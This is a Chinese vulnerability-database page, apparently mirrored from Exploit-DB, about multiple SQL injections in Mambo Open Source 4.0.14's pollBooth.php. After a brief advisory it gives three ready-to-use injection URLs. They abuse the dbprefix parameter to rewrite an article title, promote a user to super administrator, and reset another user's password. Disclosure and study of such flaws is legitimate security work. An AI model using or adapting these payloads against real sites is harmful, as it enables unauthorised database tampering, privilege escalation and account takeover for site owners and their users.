Mambo Open Source 4.0.14 – ‘PollBooth.php’ Multiple SQL Injections

Mambo Open Source 4.0.14 – ‘PollBooth.php’ Multiple SQL Injections

漏洞ID 1054288 漏洞类型
发布时间 2003-12-10 更新时间 2003-12-10
图片[1]-Mambo Open Source 4.0.14 – ‘PollBooth.php’ Multiple SQL Injections-安全小百科CVE编号 N/A
图片[2]-Mambo Open Source 4.0.14 – ‘PollBooth.php’ Multiple SQL Injections-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23430
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/9197/info

Mambo Open Source is prone to SQL injection attacks. This is due to an input validation error in 'pollBooth.php'. In particular, various user-supplied variables are used in an SQL query without proper sanitization of SQL syntax. As a result, a remote attacker could include malicious SQL syntax via URI parameters and influence database queries. 

# The title of the article N?23 becomes "hop" :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_articles%20SET%20title=char(104,111,112)
%20WHERE artid=23/*

# The user having id 52 becomes "super administrator" :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117,
112,101,114,97,100,109,105,110,105,115,116,114,97,116,111,114)
%20WHERE%20id=52/*

# The password of the user having id 10 becomes 'a' :
http://www.example.com/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20password=md5(char(97))
%20WHERE%20id=10/*

相关推荐: XPilot Server Remote Buffer Overflow Vulnerability

XPilot Server Remote Buffer Overflow Vulnerability 漏洞ID 1102253 漏洞类型 Boundary Condition Error 发布时间 2002-04-17 更新时间 2002-04-17 CVE编…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享